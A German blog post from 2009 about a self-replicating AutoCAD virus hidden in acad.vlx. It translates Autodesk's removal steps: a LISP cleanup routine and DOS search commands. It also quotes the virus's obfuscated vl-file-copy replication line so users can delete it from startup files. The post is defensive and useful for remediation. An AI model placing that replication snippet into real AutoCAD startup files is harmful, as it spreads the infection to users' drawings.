AutoCAD Virus Alarm – Bösartiger Code in “acad.vlx” PDF  | Drucken |  E-Mail
Geschrieben von: Jürgen Becker   
Montag, 10. August 2009 um 11:26 Uhr
alt

Der Virus verbreitet sich einfach indem er eine bösartige acad.vlx-Datei in den Support-Pfad oder in den Pfad der Zeichnung plaziert und sich von dort in geöffnete Zeichnungen verbreitet. Er repliziert sich selbst.

 

Die bösartige acad.vlx-Datei ist KEINE Autodesk-Datei und somit gefahrlos gelöscht werden (außer eine eingesetzte Applikation nutzt eine acad.vlx). Davon wird hier NICHT ausgegangen.

Der Virus erstellt eine Zufallstext in allen geöffneten Zeichnungen, der Virus ist somit eher harmlos, aber doch lästig.

Shaan Hurley hat auf seinem Blog - Between the Lines – eine LISP-Routine veröffentlicht, die die acad.vlx-Datei erkennt und löscht bevor AutoCAD diese läd, somit ist eine Verbreitung des Virus ausgeschlossen.

Eine technische Lösung wurde auf der AutoCAD Support Seite unter http://usa.autodesk.com/getdoc/id=TS13717811 und auf dem  Support Blog – Without A Net von Tom Stoeckel erwähnt.

Hier die Übersetzung:

  • Als System-Administrator auf Ihrem Rechner folgendes durchführen.
    • Suchen Sie den Support-Pfad Ihrer AutoCAD-Installation (z.B.  C:\Programme\AutoCAD 2010\Support).
    • Im Support-Pfad die acad20xx.lsp-Datei (z.B. bei AutoCAD 2010: acad2010.lsp) per Doppelklick öffnen und den folgenden Code einfügen. AutoCAD wird dann die acad.vlx-Datei und die logo.gif-Datei suchen und löschen.
1
2
3
4
5
6
7
8
9
10
11
12
13
 
(defun cleanvirus( / lspfiles lspfile x)
(setq lspfiles '("acad.vlx" "logo.gif"))
(foreach lspfile lspfiles
(while (setq x (findfile lspfile))
(progn
(vl-file-delete x)
(princ "\nGelöschte Datei ")
(princ x)
);progn
);while
);foreach
)
(cleanvirus)
  • Öffnen Sie folgende Dateien
    • C:\Programme\AutoCAD 20xx\Express\acetauto.lsp
    • C:\Programme\AutoCAD 20xx\Support\ai_utils.lsp
    • [ROAMABLEROOTPREFIX]\Support\acad.mnl 
      Ersetzen Sie ROAMABLEROOTPREFIX mit dem Wert, der von der Systemvariable ROAMABLEROOTPREFIX zurückgegeben wird.
  • Wenn in diesen Dateien folgender Code enthalten ist, diesen löschen.
1
2
3
4
 
(vl-file-copy
(findfile
(vl-list->string'(108 111 103 111 46 103 105 102)))
(vl-list->string'(97 99 97 100 46 118 108 120)))
  • Alle Dateien speichern
     

Damit ist der Vorschlag von Autodesk zum Entfernen des Virus beendet.

Ergänzungen von meiner Seite:

Um diese Dateien in Ihren Projektpfaden zu finden, kann ein MS-DOS Befehl genutzt werden (siehe dazu 12 Tipps für AutoCAD – Tipp 3 - oder hier ).

 
Dir acad.vlx /s /b >acadvirus.txt

und

 
Dir logo.gif /s /b >acadvirus.txt

 

Original Post von Shaan Hurley: AutoCAD Malicious Code / Virus Alert “acad.vlx” and Solution

Hoffen wir, dass Sie nichts finden.

Ihr Jürgen A. Becker.


Posted: 2009-08-10 11:26:57

Read Full Article


Zuletzt aktualisiert am Dienstag, 11. August 2009 um 08:04 Uhr